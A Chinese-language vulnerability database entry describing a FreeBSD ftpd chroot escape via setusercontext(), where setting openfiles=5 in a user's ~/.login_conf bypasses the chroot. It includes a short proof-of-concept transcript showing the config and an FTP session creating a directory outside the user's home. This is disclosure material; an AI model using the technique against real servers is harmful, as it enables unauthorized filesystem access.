FreeBSD ftpd setusercontext()远程权限提升漏洞

基本字段

漏洞编号:
SSV-12129
披露/发现时间:
未知
提交时间:
2009-08-26
漏洞等级:
漏洞类别:
本地溢出
影响组件:
FreeBSD
(7.0,5.0)
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 Knownsec 共获得  0KB

BUGTRAQ ID: 36119

FreeBSD就是一种运行在Intel平台上、可以自由使用的开放源码Unix类系统。

FreeBSD及其他一些BSD系统有一个用于设置用户上下文的功能,如FreeBSD中的setusercontext()函数:

setusercontext(lc, pw, (uid_t)0,
    LOGIN_SETLOGIN|LOGIN_SETGROUP|LOGIN_SETPRIORITY|
    LOGIN_SETRESOURCES|LOGIN_SETUMASK);

其中的LOGIN_SETRESOURCES设置允许用户设置资源。根据用户手册所述:

 LOGIN_SETRESOURCES  根据系统登录类数据库中所指定的值为当前进程设置资源限制。使用类功能标签,可选择-cur(软限制)或-max(硬限制)后缀及相关的资源设置:

         cputime       RLIMIT_CPU
         filesize      RLIMIT_FSIZE
         datasize      RLIMIT_DATA
         stacksize     RLIMIT_STACK
         coredumpsize  RLIMIT_CORE
         memoryuse     RLIMIT_RSS
         memorylocked  RLIMIT_MEMLOCK
         maxproc       RLIMIT_NPROC
         openfiles     RLIMIT_NOFILE
         sbsize        RLIMIT_SBSIZE
         vmemoryuse    RLIMIT_VMEM

远程攻击者可以利用这些选项设置自己的~/.login_conf配置。例如,将openfiles设置为5就可以绕过ftpd.c中的chroot()限制。

FreeBSD 7.0 FreeBSD 5.0 厂商补丁:

FreeBSD

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.freebsd.org/security/index.html

共 0  兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.35KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
---snip---
%cat /etc/ftpchroot
kcope
%cat .login_conf
me:\
:openfiles=5:
%cap_mkdb .login_conf
%ftp 192.168.2.4
Connected to 192.168.2.4.
220 FTP server (Version 6.00LS) ready.
Name (192.168.2.4:root): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /usr/home/kcope
ftp> mkdir /tmp/foobar
257 "/tmp/foobar" directory created.
ftp> ls
425 Can't open passive connection: Too many open files.
425 Can't open passive connection: Too many open files.
200 PORT command successful.
550 /bin/ls -lgA: Too many open files.
ftp>
---snip---
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 3 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

人气 1272
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负